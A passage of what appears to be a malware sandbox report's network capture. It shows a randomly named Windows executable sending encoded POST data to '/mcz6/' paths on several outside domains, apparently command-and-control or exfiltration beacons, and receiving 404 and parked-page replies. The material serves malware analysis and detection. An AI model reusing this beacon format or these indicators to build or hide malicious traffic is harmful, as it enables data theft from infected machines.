                                                    29 | 192.168.2.9 | 49743 | 104.37.39.71 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:20.106504917 CEST | 750 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh=CDSZib7hojvV9QEi1dzzTBqVJ4oZdVvJsbBUdzR9jLGlBPdsHlKQCZZ9CkZtAAW6iDuoICsUBIh7QyHI0XQvd70kE7rkOOvHsnAJobt8F+rxx3RZ5TfkNyhsMhKOJinh24kOhsrNZPmSa385zt03jcvtOQOu43jlT1sF6v1fGD9UcTzx3kKhZWsE4E5h
                                                    May 16, 2024 17:21:20.928128958 CEST | 161 | IN | HTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:20 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Ascii: 404 page not found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.9 | 49744 | 104.37.39.71 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:22.633918047 CEST | 774 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg5SlArRsEnuQBZZ9XUZkEAWxiDqgIAoUBIF7QwPI0kIgcr0mLbrqDuvHsnAJob5GF+DxxEZZ6yfnRihvLhKOaynt24lbhtnnZMeSayA5y/cw4MvnAwP80XSfWGY46s1aGiFQbyTvmWD6MBsj/jwJT81eDhKbLGHi/VlhhKnWnQ==
                                                    May 16, 2024 17:21:23.629556894 CEST | 161 | IN | HTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:23 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Ascii: 404 page not found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.9 | 49745 | 104.37.39.71 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:25.166233063 CEST | 1787 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.gledingakademiet.no
                                                    Referer: http://www.gledingakademiet.no/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh= [TRUNCATED]
                                                    May 16, 2024 17:21:26.427087069 CEST | 161 | IN | HTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:26 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Ascii: 404 page not found


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.9 | 49746 | 104.37.39.71 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:27.714375973 CEST | 479 | OUT | GET /mcz6/?1Joh=PB65ht3xmDnV1ShZ+uHkcVi2Uq9TdnP+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rV9UCB7jgFNORqHszkZ5HGMai3UIp4A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:21:28.717398882 CEST | 252 | IN | HTTP/1.1 200 OK
                                                    Content-Length: 101
                                                    Content-Type: text/html; charset=utf-8
                                                    Date: Thu, 16 May 2024 15:21:28 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Ascii: <html><head> <title>Parked</title></head><body> <h1>Parked</h1></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.9 | 49747 | 199.59.243.225 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:43.322536945 CEST | 735 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 78 6e 2b 59 4d 75 75 70 36 59 77 39 4c 32 5a 34 46 50 70 44 61 51 4c 6b 47 45 6b 6b 39 62 6c 46 4f 57 74 47 49 65 2f 38 50 35 6a 42 6d 70 54 4b 51 4d 4f 6b 5a 51 37 6d 42 43 7a 36 6a 31 42 35 66 52 4c 6b 6f 59 44 62 64 6a 4b 47 77 58 42 6f 47 77 70 44 4e 75 78 36 77 58 71 72 6a 33 46 77 76 48 31 39 68 49 4c 2b 6e 32 36 59 70 49 6c 47 74 73 73 4b 31 66 6a 78 39 74 35 42 4a 72 72 75 50 39 33 7a 75 75 59 6c 50 39 5a 73 42 36 4a 30 30 6c 77 57 68 57 51 78 39 50 52 2f 4d 61 32 53 42 64 45 68 2f 4c 62 34 34 79 4a 61 6d 71 5a 5a
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFxn+YMuup6Yw9L2Z4FPpDaQLkGEkk9blFOWtGIe/8P5jBmpTKQMOkZQ7mBCz6j1B5fRLkoYDbdjKGwXBoGwpDNux6wXqrj3FwvH19hIL+n26YpIlGtssK1fjx9t5BJrruP93zuuYlP9ZsB6J00lwWhWQx9PR/Ma2SBdEh/Lb44yJamqZZ
                                                     May 16, 2024 17:21:43.887382984 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:43 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: cdbc7097-3725-4c9f-a4a0-895e60c5d02c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=cdbc7097-3725-4c9f-a4a0-895e60c5d02c; expires=Thu, 16 May 2024 15:36:43 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                     May 16, 2024 17:21:43.892095089 CEST | 575 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2RiYzcwOTctMzcyNS00YzlmLWE0YTAtODk1ZTYwYzVkMDJjIiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     34 | 192.168.2.9 | 49748 | 199.59.243.225 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:21:45.851510048 CEST | 759 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 52 46 4f 79 70 47 4a 62 54 38 4d 35 6a 42 70 4a 53 41 55 4d 4f 74 5a 51 48 75 42 43 2f 36 6a 31 46 35 66 54 54 6b 6f 49 2f 59 50 6a 4b 2b 38 33 42 71 49 51 70 44 4e 75 78 36 77 58 4f 46 6a 7a 70 77 73 30 74 39 7a 71 69 6f 6b 32 36 62 2f 59 6c 47 70 73 73 77 31 66 6a 48 39 73 55 55 4a 74 76 75 50 2f 66 7a 76 2f 59 69 55 4e 59 6e 4d 61 49 35 69 6c 42 59 72 52 45 2f 30 38 74 5a 53 73 69 35 43 38 6b 2f 75 35 53 6a 74 6c 4a 39 68 4e 51 78 49 35 31 6c 55 35 34 41 35 6b 2f 78 70 44 56 49 72 69 41 44 43 67 3d 3d
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09pRFOypGJbT8M5jBpJSAUMOtZQHuBC/6j1F5fTTkoI/YPjK+83BqIQpDNux6wXOFjzpws0t9zqiok26b/YlGpssw1fjH9sUUJtvuP/fzv/YiUNYnMaI5ilBYrRE/08tZSsi5C8k/u5SjtlJ9hNQxI51lU54A5k/xpDVIriADCg==
                                                     May 16, 2024 17:21:46.529448032 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:45 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: 4996aa8a-e89d-4530-80a5-78773976669e
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=4996aa8a-e89d-4530-80a5-78773976669e; expires=Thu, 16 May 2024 15:36:46 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                     May 16, 2024 17:21:46.534107924 CEST | 575 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDk5NmFhOGEtZTg5ZC00NTMwLTgwYTUtNzg3NzM5NzY2NjllIiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     35 | 192.168.2.9 | 49749 | 199.59.243.225 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:21:48.759565115 CEST | 1772 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 70 46 4f 48 39 47 49 34 72 38 44 5a 6a 42 6b 70 53 42 55 4d 50 39 5a 51 76 55 42 43 6a 71 6a 77 5a 35 51 51 62 6b 2f 4c 6e 59 56 7a 4b 2b 30 58 42 6e 47 77 70 7a 4e 75 68 2b 77 58 2b 46 6a 7a 70 77 73 79 70 39 6c 49 4b 6f 69 32 36 59 70 49 6c 43 74 73 74 66 31 66 36 79 39 73 67 45 4a 39 50 75 4f 66 76 7a 6f 4e 41 69 59 4e 59 6c 4e 61 4a 71 69 6c 4e 54 72 56 6b 7a 30 38 70 6a 53 72 75 35 53 74 56 68 36 61 71 67 75 32 68 5a 30 61 6b 70 42 64 6b 45 56 34 68 50 6b 46 43 51 39 51 49 74 6c 6a 56 72 55 75 55 2f 6d 6d 38 53 6e 71 48 4a 71 41 74 6f 66 54 56 30 47 4f 61 6d 42 33 64 56 41 32 49 48 64 44 71 70 79 63 42 63 6e 71 6c 6f 46 32 53 7a 67 73 2f 56 6a 2b 6e 61 4b 61 4c 6c 55 79 6d 42 79 49 34 49 6f 2f 4a 2f 59 4d 6c 34 58 33 4e 51 6e 4d 31 2f 79 6e 2b 42 6b 31 68 6d 37 79 39 54 56 4d 30 55 47 2f 51 30 63 33 78 74 6d 6c 35 4b 46 4a 71 4c 41 6d 69 6a 6e 68 75 36 6b [TRUNCATED]
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09ppFOH9GI4r8DZjBkpSBUMP9ZQvUBCjqjwZ5QQbk/LnYVzK+0XBnGwpzNuh+wX+Fjzpwsyp9lIKoi26YpIlCtstf1f6y9sgEJ9PuOfvzoNAiYNYlNaJqilNTrVkz08pjSru5StVh6aqgu2hZ0akpBdkEV4hPkFCQ9QItljVrUuU/mm8SnqHJqAtofTV0GOamB3dVA2IHdDqpycBcnqloF2Szgs/Vj+naKaLlUymByI4Io/J/YMl4X3NQnM1/yn+Bk1hm7y9TVM0UG/Q0c3xtml5KFJqLAmijnhu6k4vpUS0gu5TiNyrDr8eLIRmeLcz79ZvluNRylwD8+zo3tBtjEiLISa8e+4382aCpY+1kycEM8nphg6muPZRNMGeX3jIpl1bDbPyfdeljkFs/w0hmBeWCzAIRWxeBwgLPuTCFOcHb6ZPcfizdv4W2K/Yg43eUTVReUADAVO2itpdPX/vwR82/IrOA/5XcVhqCFq9ID6vDmnETBp+2fybT6MFI7kffkPrTHnNwI2SWDt8f37rdvG5bJYi7KTqbvEag0++0WkvWEk+NCy84vQmJq6eH91QxfkT07Q829datZynYiGaVrxGl26NEgaLh8wxGQnJlciGL+jqAz3Tao6QyQHiUnNvOyjRtkBW/SiB9s27kqNNDxy+6Z0YzKVZDrycJGsRXs4p4kToAjcO1Q4ASj8EQwdXVgAWR7qFhAbKHUnz5Z4rfVgiqq8WuSMJ+GzZ3kz/nkQfKGtY+0neALfyAj0B9ekWDOT97Tcbs8YwPqvrOezSzcv399Xh+LfUjpMBqkUNk329KvwnyQWVHYcq+bzcsOCsPv/z2QUpgWmU6MkFghGSUcJc7EgbPo/ItD+m0XS3wiP9k3IwEidSZW2f6z2nHXtdcOLA7X4A5y3roomeXCkcPh4MqXYr6dwqalkxVIHWUdb/JPhJ4x2XOJkXtu1EjXsFwwpg1ULv [TRUNCATED]
                                                     May 16, 2024 17:21:49.398210049 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:49 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: 8b99cfdc-99e1-4d80-b1cc-40f27f81866d
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=8b99cfdc-99e1-4d80-b1cc-40f27f81866d; expires=Thu, 16 May 2024 15:36:49 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                     May 16, 2024 17:21:49.402992010 CEST | 224 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGI5OWNmZGMtOTllMS00ZDgwLWIxY2MtNDBmMjdmODE4NjZkIiwicGFnZV9
                                                     May 16, 2024 17:21:49.403009892 CEST | 351 | IN | Data Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 45 31 4f 44 63 79 4f 54 41 35 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 65 6e 64 6c 63 6e 5a 6c 63 6e 52 71 5a 58 4d 75 59 6d 55 76 62 57 4e 36 4e 69 38 69 4c
                                                    Data Ascii: 0aW1lIjoxNzE1ODcyOTA5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuendlcnZlcnRqZXMuYmUvbWN6Ni8iLCJwYWdlX21ldGhvZCI6IlBPU1QiLCJwYWdlX3JlcXVlc3QiOnt9LCJwYWdlX2hlYWRlcnMiOnsicmVmZXJlciI6WyJodHRwOi8vd3d3Lnp3ZXJ2ZXJ0amVzLmJlL21jejYvIl19LCJob3N0Ijoid3d3Lnp3ZXJ2ZX


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
